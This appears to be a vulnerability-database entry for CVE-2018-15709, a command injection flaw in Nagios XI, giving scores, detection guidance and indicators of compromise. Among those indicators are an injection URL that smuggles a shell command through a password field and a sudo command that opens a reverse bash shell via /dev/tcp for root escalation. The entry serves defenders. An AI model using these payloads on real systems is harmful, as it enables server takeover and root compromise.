CVE-2018-15709

Published: 2018-11-14

Nagios XI 5.5.6 allows remote authenticated attackers to execute arbitrary commands via a crafted HTTP request.

Priority: P2 · 64 · CVSS 3.0: 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 21.02% (97.3rd percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | — | — |
Detection & IOCs (extracted from sources)

- URL: https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312
- Command: sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'

Detection guidance:

- Monitor HTTP requests to /nagiosxi/ajaxhelper.php with cmd=submitcommand and cmd value 1100 (COMMAND_NAGIOSXI_SET_HTACCESS), particularly inspecting the 'password' field in the opts JSON body for shell metacharacters (e.g., single quotes, semicolons).
- Alert on execution of cmdsubsys.php spawning unexpected child processes or shell commands, as the subsystem passes unsanitized input directly to system().
- Detect sudo invocations of autodiscover_new.php by the 'apache' or 'nagios' users, especially with --addresses parameters containing shell injection characters (semicolons, redirects, /bin/bash).
- Watch for outbound TCP connections from the Nagios XI server to unexpected external IPs on port 4444, indicative of a reverse bash shell established via the autodiscover_new.php LPE chain.
- Flag creation of unexpected files under /usr/local/nagiosxi/tmp/ (e.g., whoami.txt) as evidence of successful command injection via cmdsubsys.php.

Notes:

- The vulnerability is exploitable by low-privileged (non-admin) authenticated users, not just administrators, broadening the attacker surface beyond privileged accounts.
- The sudoers configuration grants both the 'nagios' and 'apache' OS users passwordless sudo rights to autodiscover_new.php, meaning compromise of either user (e.g., via CVE-2018-15708 or CVE-2018-15709) is sufficient for full root escalation.
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
No detection rules found.
No public exploits indexed.